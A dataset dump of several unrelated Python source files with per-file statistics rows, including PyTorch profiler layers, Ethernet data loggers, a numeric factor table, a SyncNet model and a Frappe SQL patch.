# Note: exp, sum-reduce, divide
#flops = elems * 3
return 0
def bytes(self):
b = self.elems() * Utility.typeToBytes(self.type)
b *= 3 if self.dir == "fprop" else 5 #verify
return b
class LogSoftmax(OperatorLayerBase):
def __init__(self, d):
marker = eval(d.argMarker[0])
mod = marker['mod']
op = marker['op']
args = marker['args']
self.marker = marker
self.mod_ = mod
self.op_ = op
self.args = args
assert (mod == "torch.nn.functional")
assert (op == "log_softmax")
#Filter out named parameters
args = list(filter(lambda x : x['name'] == '', args))
assert (len(args) <= 2)
#Get input
if (args[0]['name'] == ""):
i = args[0]
else:
i = list(filter(lambda x : x['name'] == "input", args))[0]
t = i['dtype']
self.shape = i['shape']
self.type = i['dtype']
self.dir = d.dir
return
def op(self):
return self.op_
def mod(self):
return self.mod_
def tc(self):
return "-"
def params(self):
p = OrderedDict([('T', self.shape), ('type', self.type)])
return p
def elems(self):
return Utility.numElems(self.shape)
def flops(self):
# Note: exp, sum-reduce, divide, log
#flops = elems * 4
return 0
def bytes(self):
b = self.elems() * Utility.typeToBytes(self.type)
b *= 3 if self.dir == "fprop" else 5 #verify
return b
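The bytes() accounting in both Softmax and LogSoftmax above reduces to element count times dtype width times a pass multiplier (3 for fprop, 5 for bprop, flagged "#verify" in the source). A stand-alone sketch of that arithmetic — num_elems and DTYPE_BYTES are hypothetical stand-ins for Utility.numElems and Utility.typeToBytes, which are defined elsewhere in pyprof:

```python
from functools import reduce
from operator import mul

# Hypothetical stand-in for Utility.typeToBytes.
DTYPE_BYTES = {"float16": 2, "float32": 4, "float64": 8}

def num_elems(shape):
    """Total element count of a tensor shape (stand-in for Utility.numElems)."""
    return reduce(mul, shape, 1)

def softmax_bytes(shape, dtype, direction):
    """Rough memory-traffic estimate used by the Softmax layer above:
    3 passes over the tensor in fprop, 5 in bprop (unverified, per the
    '#verify' comment in the source)."""
    b = num_elems(shape) * DTYPE_BYTES[dtype]
    return b * (3 if direction == "fprop" else 5)

print(softmax_bytes((32, 1000), "float32", "fprop"))  # 32*1000*4*3 = 384000
print(softmax_bytes((32, 1000), "float32", "bprop"))  # 32*1000*4*5 = 640000
```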
| 18.87931 | 61 | 0.623744 | 321 | 2,190 | 4.202492 | 0.205607 | 0.059303 | 0.041512 | 0.037806 | 0.818384 | 0.818384 | 0.802076 | 0.802076 | 0.802076 | 0.802076 | 0 | 0.00981 | 0.208676 | 2,190 | 115 | 62 | 19.043478 | 0.768609 | 0.079452 | 0 | 0.794872 | 0 | 0 | 0.070752 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 1 | 0.205128 | false | 0 | 0.038462 | 0.128205 | 0.474359 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 9 |
42a4040aa17b8842b86678f829c0814fa4a90696 | 1,881 | py | Python | src/aceinna/devices/widgets/ethernet_data_logger.py | lihaiyong827/python-openimu | f1c536ba4182aaeabd87b63c08ebd92f97e8dbb4 | [
"Apache-2.0"
] | 41 | 2018-07-20T17:30:33.000Z | 2022-02-24T08:17:39.000Z | src/aceinna/devices/widgets/ethernet_data_logger.py | lihaiyong827/python-openimu | f1c536ba4182aaeabd87b63c08ebd92f97e8dbb4 | [
"Apache-2.0"
] | 52 | 2018-06-25T22:15:14.000Z | 2022-03-10T07:30:56.000Z | src/aceinna/devices/widgets/ethernet_data_logger.py | lihaiyong827/python-openimu | f1c536ba4182aaeabd87b63c08ebd92f97e8dbb4 | [
"Apache-2.0"
] | 31 | 2018-12-19T00:10:08.000Z | 2022-03-19T02:14:03.000Z | import time
import json
class EthernetDataLogger:
def __init__(self, properties, communicator, log_writer):
self.log_writer = log_writer
self.communicator = communicator
def run(self):
''' start to log data from Ethernet '''
print('start to log data from Ethernet\n')
self._read_and_write()
def _read_and_write(self):
while True:
read_data = self.communicator.read()
if read_data:
self.log_writer.write(read_data)
pass
class EthernetDebugDataLogger:
def __init__(self, properties, communicator, log_writer):
self.log_writer = log_writer
self.communicator = communicator
def run(self):
''' start to log data from lan port '''
print('start to log debug data from Ethernet\n')
self._read_and_write()
def _read_and_write(self):
# send get configuration
while True:
try:
read_data = self.communicator.read()
if read_data:
self.log_writer.write(read_data)
except Exception as e:
print('Data Log Failed, exit')
pass
class EthernetRTCMDataLogger:
def __init__(self, properties, communicator, log_writer):
self.log_writer = log_writer
self.communicator = communicator
def run(self):
print('start to log RTCM data from Ethernet\n')
self._read_and_write()
def _read_and_write(self):
# send get configuration
print('------------------------------------------------------------')
while True:
try:
read_data = self.communicator.read()
if read_data:
self.log_writer.write(read_data)
except Exception as e:
print('Data Log Failed, exit')
pass
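All three logger classes above share the same read-and-write loop: poll communicator.read() and forward any data to log_writer.write(). A minimal in-memory sketch of that pattern — DummyComm and DummyWriter are hypothetical stand-ins, not part of the aceinna library, and this version stops on end-of-data instead of looping forever:

```python
class DummyComm:
    """Stand-in communicator that yields queued packets, then None."""
    def __init__(self, packets):
        self._packets = list(packets)
    def read(self):
        return self._packets.pop(0) if self._packets else None

class DummyWriter:
    """Stand-in log writer that records everything it is given."""
    def __init__(self):
        self.logged = []
    def write(self, data):
        self.logged.append(data)

def read_and_write(comm, writer):
    while True:
        data = comm.read()
        if data is None:   # the real loggers run until interrupted
            break
        writer.write(data)

comm = DummyComm([b'\x01', b'\x02'])
writer = DummyWriter()
read_and_write(comm, writer)
print(writer.logged)  # [b'\x01', b'\x02']
```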
| 29.857143 | 77 | 0.573099 | 208 | 1,881 | 4.9375 | 0.206731 | 0.105161 | 0.075949 | 0.061344 | 0.83739 | 0.83739 | 0.819864 | 0.819864 | 0.819864 | 0.819864 | 0 | 0 | 0.320574 | 1,881 | 62 | 78 | 30.33871 | 0.803599 | 0.059543 | 0 | 0.8125 | 0 | 0 | 0.120798 | 0.034188 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0.0625 | 0.041667 | 0 | 0.291667 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
c42ccff53aa5da04c2d0fc4ecc1302051618b2cb | 25,070 | py | Python | pytlwall/yokoya_factors/rect_long.py | tatianarijoff/tlwall | 127731fdb5908c3ab515432fe112cfb07d75b9e0 | [
"MIT"
] | null | null | null | pytlwall/yokoya_factors/rect_long.py | tatianarijoff/tlwall | 127731fdb5908c3ab515432fe112cfb07d75b9e0 | [
"MIT"
] | null | null | null | pytlwall/yokoya_factors/rect_long.py | tatianarijoff/tlwall | 127731fdb5908c3ab515432fe112cfb07d75b9e0 | [
"MIT"
] | null | null | null | import numpy as np
rect_long = np.array([
1.000,
0.995,
0.990,
0.985,
0.984,
0.984,
0.983,
0.982,
0.981,
0.981,
0.980,
0.980,
0.980,
0.978,
0.977,
0.976,
0.974,
0.974,
0.973,
0.972,
0.972,
0.971,
0.971,
0.970,
0.969,
0.968,
0.968,
0.967,
0.966,
0.965,
0.964,
0.963,
0.963,
0.962,
0.961,
0.960,
0.960,
0.959,
0.959,
0.958,
0.958,
0.958,
0.957,
0.957,
0.957,
0.955,
0.954,
0.952,
0.951,
0.950,
0.949,
0.949,
0.948,
0.948,
0.948,
0.947,
0.947,
0.946,
0.946,
0.946,
0.946,
0.946,
0.945,
0.945,
0.944,
0.944,
0.944,
0.943,
0.942,
0.941,
0.941,
0.940,
0.940,
0.940,
0.940,
0.940,
0.940,
0.939,
0.938,
0.937,
0.937,
0.937,
0.937,
0.937,
0.937,
0.937,
0.936,
0.936,
0.935,
0.935,
0.934,
0.934,
0.934,
0.934,
0.934,
0.933,
0.933,
0.933,
0.932,
0.932,
0.931,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.929,
0.929,
0.928,
0.928,
0.927,
0.927,
0.927,
0.927,
0.927,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.927,
0.927,
0.927,
0.927,
0.927,
0.927,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.927,
0.927,
0.927,
0.926,
0.926,
0.926,
0.926,
0.927,
0.927,
0.927,
0.927,
0.928,
0.929,
0.929,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.931,
0.931,
0.932,
0.932,
0.933,
0.933,
0.934,
0.934,
0.935,
0.935,
0.935,
0.935,
0.935,
0.935,
0.935,
0.935,
0.935,
0.935,
0.936,
0.936,
0.936,
0.937,
0.937,
0.937,
0.937,
0.938,
0.938,
0.938,
0.938,
0.938,
0.938,
0.938,
0.938,
0.938,
0.938,
0.938,
0.939,
0.939,
0.940,
0.940,
0.940,
0.940,
0.940,
0.940,
0.940,
0.940,
0.941,
0.940,
0.941,
0.941,
0.942,
0.942,
0.943,
0.943,
0.944,
0.944,
0.945,
0.945,
0.945,
0.945,
0.945,
0.945,
0.945,
0.946,
0.947,
0.948,
0.948,
0.948,
0.948,
0.948,
0.948,
0.949,
0.949,
0.949,
0.950,
0.950,
0.951,
0.952,
0.953,
0.953,
0.953,
0.953,
0.953,
0.953,
0.953,
0.953,
0.954,
0.954,
0.954,
0.955,
0.955,
0.955,
0.955,
0.955,
0.955,
0.955,
0.955,
0.956,
0.956,
0.956,
0.956,
0.956,
0.957,
0.958,
0.959,
0.959,
0.959,
0.959,
0.959,
0.959,
0.959,
0.959,
0.959,
0.959,
0.960,
0.960,
0.960,
0.960,
0.960,
0.961,
0.961,
0.962,
0.962,
0.962,
0.962,
0.962,
0.962,
0.962,
0.962,
0.962,
0.962,
0.962,
0.963,
0.963,
0.964,
0.964,
0.965,
0.966,
0.966,
0.967,
0.968,
0.968,
0.968,
0.968,
0.968,
0.968,
0.968,
0.968,
0.968,
0.968,
0.968,
0.968,
0.967,
0.967,
0.968,
0.968,
0.968,
0.969,
0.969,
0.969,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.971,
0.971,
0.971,
0.971,
0.971,
0.971,
0.970,
0.971,
0.972,
0.972,
0.973,
0.973,
0.973,
0.973,
0.973,
0.974,
0.974,
0.973,
0.973,
0.973,
0.973,
0.973,
0.974,
0.974,
0.974,
0.974,
0.974,
0.974,
0.974,
0.974,
0.974,
0.975,
0.975,
0.976,
0.976,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.978,
0.978,
0.978,
0.978,
0.978,
0.978,
0.978,
0.979,
0.979,
0.980,
0.980,
0.981,
0.981,
0.981,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.983,
0.983,
0.984,
0.984,
0.984,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.986,
0.986,
0.986,
0.986,
0.986,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.986,
0.986,
0.986,
0.986,
0.986,
0.986,
0.986,
0.986,
0.986,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.984,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.985,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.984,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.984,
0.985,
0.985,
0.986,
0.986,
0.987,
0.987,
0.987,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.989,
0.989,
0.989,
0.989,
0.990,
0.990,
0.990,
0.990,
0.991,
0.991,
0.991,
0.991,
0.992,
0.992,
0.992,
0.992,
0.992,
0.993,
0.993,
0.993,
0.993,
0.994,
0.994,
0.994,
0.994,
0.995,
0.995,
0.995,
0.995,
0.996,
0.996,
0.996,
0.996,
0.997,
0.997,
0.997,
0.997,
0.998,
0.998,
0.998,
0.998,
0.999,
0.999,
0.999,
0.999,
1.000,
1.000,
1.000
])
| 24.920477 | 24 | 0.160949 | 2,010 | 25,070 | 2.006965 | 0.041791 | 0.366882 | 0.458602 | 0.713932 | 0.935796 | 0.859445 | 0.855726 | 0.802429 | 0.802429 | 0.765741 | 0 | 0.662694 | 0.758995 | 25,070 | 1,005 | 25 | 24.945274 | 0.004965 | 0 | 0 | 0.996016 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.000996 | 0 | 0.000996 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
c4343e9c3fe561b42bb0ce0cdc3fa6ef19e3897c | 7,321 | py | Python | models/syncnet_hd.py | wuchangsheng951/HD_wav2lip_f | f93676e87efba42556c3b5ae1c3c7aa80bc9188e | [
"MIT"
] | 1 | 2021-05-16T11:47:30.000Z | 2021-05-16T11:47:30.000Z | models/syncnet_hd.py | wuchangsheng951/HD_wav2lip_f | f93676e87efba42556c3b5ae1c3c7aa80bc9188e | [
"MIT"
] | 1 | 2021-05-16T11:47:17.000Z | 2021-05-16T13:02:27.000Z | models/syncnet_hd.py | wuchangsheng951/HD_wav2lip_f | f93676e87efba42556c3b5ae1c3c7aa80bc9188e | [
"MIT"
] | null | null | null |
import torch
from torch import nn
from torch.nn import functional as F
from .conv import Conv2d
# from conv import Conv2d
class SyncNet_color(nn.Module):
def __init__(self):
super(SyncNet_color, self).__init__()
self.face_encoder = nn.Sequential(
Conv2d(15, 32, kernel_size=(7, 7), stride=1, padding=3),
Conv2d(32, 64, kernel_size=5, stride=(1, 2), padding=1),
Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(64, 128, kernel_size=3, stride=2, padding=1),
Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(128, 256, kernel_size=3, stride=2, padding=1),
Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(256, 512, kernel_size=3, stride=2, padding=1),
Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(512, 512, kernel_size=3, stride=2, padding=1),
Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(512, 512, kernel_size=3, stride=2, padding=1),
Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(512, 512, kernel_size=3, stride=2, padding=1),
Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(512, 512, kernel_size=3, stride=2, padding=1),
# Conv2d(512, 512, kernel_size=3, stride=1, padding=0),
Conv2d(512, 512, kernel_size=2, stride=1, padding=0),
)
self.audio_encoder = nn.Sequential(
Conv2d(1, 32, kernel_size=3, stride=1, padding=1),
Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(32, 64, kernel_size=3, stride=(3, 1), padding=1),
Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(64, 128, kernel_size=3, stride=3, padding=1),
Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(128, 256, kernel_size=3, stride=(3, 2), padding=1),
Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(256, 512, kernel_size=3, stride=1, padding=0),
Conv2d(512, 512, kernel_size=1, stride=1, padding=0),)
def forward(self, audio_sequences, face_sequences): # audio_sequences := (B, dim, T)
face_embedding = self.face_encoder(face_sequences)
audio_embedding = self.audio_encoder(audio_sequences)
# print(face_embedding.shape, audio_embedding.shape)
audio_embedding = audio_embedding.view(audio_embedding.size(0), -1)
face_embedding = face_embedding.view(face_embedding.size(0), -1)
audio_embedding = F.normalize(audio_embedding, p=2, dim=1)
face_embedding = F.normalize(face_embedding, p=2, dim=1)
return audio_embedding, face_embedding
# class SyncNet_color(nn.Module):
# def __init__(self):
# super(SyncNet_color, self).__init__()
# self.face_encoder = nn.Sequential(
# Conv2d(15, 32, kernel_size=(7, 7), stride=1, padding=3),
# Conv2d(32, 64, kernel_size=5, stride=(1, 2), padding=1),
# Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(64, 128, kernel_size=3, stride=2, padding=1),
# Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(128, 256, kernel_size=3, stride=2, padding=1),
# Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(256, 512, kernel_size=3, stride=2, padding=1),
# Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(512, 512, kernel_size=3, stride=2, padding=1),
# Conv2d(512, 512, kernel_size=3, stride=1, padding=0),
# Conv2d(512, 512, kernel_size=1, stride=1, padding=0),)
# self.audio_encoder = nn.Sequential(
# Conv2d(1, 32, kernel_size=3, stride=1, padding=1),
# Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(32, 64, kernel_size=3, stride=(3, 1), padding=1),
# Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(64, 128, kernel_size=3, stride=3, padding=1),
# Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(128, 256, kernel_size=(4,1), stride=1, padding=0),
# Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(256, 512, kernel_size=3, stride=1, padding=1),
# # Conv2d(128, 512, kernel_size=3, stride=1, padding=0),
# # Conv2d(512, 512, kernel_size=1, stride=1, padding=0),
# )
# def forward(self, audio_sequences, face_sequences): # audio_sequences := (B, dim, T)
# face_embedding = self.face_encoder(face_sequences)
# audio_embedding = self.audio_encoder(audio_sequences)
# audio_embedding = audio_embedding.view(audio_embedding.size(0), -1)
# face_embedding = face_embedding.view(face_embedding.size(0), -1)
# audio_embedding = F.normalize(audio_embedding, p=2, dim=1)
# face_embedding = F.normalize(face_embedding, p=2, dim=1)
# return audio_embedding, face_embedding
if __name__ == "__main__":
x = torch.randn((32, 15, 128, 256))
mel = torch.randn((32, 1, 80, 16))
y = torch.randn((32, 1))
model = SyncNet_color()
a, v = model(mel, x)
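SyncNet_color's forward pass L2-normalizes both embeddings with F.normalize(..., p=2, dim=1) so their dot product is a cosine similarity. A pure-Python sketch (not from the repo) of that per-row normalization:

```python
import math

def l2_normalize(vec, eps=1e-12):
    """Pure-Python analogue of F.normalize(vec, p=2, dim=1) for one row:
    divide by the Euclidean norm, clamped below by eps."""
    norm = math.sqrt(sum(v * v for v in vec))
    return [v / max(norm, eps) for v in vec]

a = l2_normalize([3.0, 4.0])
print(a)  # [0.6, 0.8]
```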
| 44.640244 | 90 | 0.610709 | 1,042 | 7,321 | 4.148752 | 0.06142 | 0.164238 | 0.157761 | 0.243812 | 0.944946 | 0.941013 | 0.941013 | 0.941013 | 0.939394 | 0.939394 | 0 | 0.128228 | 0.243683 | 7,321 | 163 | 91 | 44.91411 | 0.652519 | 0.461139 | 0 | 0.4 | 0 | 0 | 0.002058 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.066667 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c485b5b10ab867163a1eab576b7d7b4acd962d9e | 131 | py | Python | frappe-bench/apps/erpnext/erpnext/patches/v8_0/addresses_linked_to_lead.py | Semicheche/foa_frappe_docker | a186b65d5e807dd4caf049e8aeb3620a799c1225 | [
"MIT"
] | null | null | null | frappe-bench/apps/erpnext/erpnext/patches/v8_0/addresses_linked_to_lead.py | Semicheche/foa_frappe_docker | a186b65d5e807dd4caf049e8aeb3620a799c1225 | [
"MIT"
] | null | null | null | frappe-bench/apps/erpnext/erpnext/patches/v8_0/addresses_linked_to_lead.py | Semicheche/foa_frappe_docker | a186b65d5e807dd4caf049e8aeb3620a799c1225 | [
"MIT"
] | null | null | null | import frappe
def execute():
frappe.db.sql("""UPDATE `tabDynamic Link` SET link_doctype = 'Lead' WHERE link_doctype = 'Load'""")
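The patch above is a single UPDATE that corrects mistyped 'Load' doctypes on Dynamic Link rows to 'Lead'. A stand-alone sketch of the same statement against an in-memory SQLite table (a stand-in for `tabDynamic Link`; the real patch runs raw SQL through frappe.db.sql against MariaDB):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE dynamic_link (link_doctype TEXT)")
conn.executemany("INSERT INTO dynamic_link VALUES (?)",
                 [("Load",), ("Customer",)])
# Same fix as the patch: rewrite the mistyped doctype.
conn.execute("UPDATE dynamic_link SET link_doctype = 'Lead' "
             "WHERE link_doctype = 'Load'")
rows = [r[0] for r in conn.execute(
    "SELECT link_doctype FROM dynamic_link ORDER BY rowid")]
print(rows)  # ['Lead', 'Customer']
```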
| 26.2 | 100 | 0.709924 | 18 | 131 | 5.055556 | 0.777778 | 0.241758 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129771 | 131 | 4 | 101 | 32.75 | 0.798246 | 0 | 0 | 0 | 0 | 0 | 0.59542 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6718dfe4452e1d2f471fa308b4618a0cbc42637d | 43 | py | Python | roiextractors/extractors/suite2p/__init__.py | yarikoptic/roiextractors | bf538658097ef9ceb84abf04115ddf919a0c32dd | [
"BSD-3-Clause"
] | null | null | null | roiextractors/extractors/suite2p/__init__.py | yarikoptic/roiextractors | bf538658097ef9ceb84abf04115ddf919a0c32dd | [
"BSD-3-Clause"
] | null | null | null | roiextractors/extractors/suite2p/__init__.py | yarikoptic/roiextractors | bf538658097ef9ceb84abf04115ddf919a0c32dd | [
"BSD-3-Clause"
] | null | null | null | from .suite2psegmentationextractor import * | 43 | 43 | 0.883721 | 3 | 43 | 12.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025 | 0.069767 | 43 | 1 | 43 | 43 | 0.925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
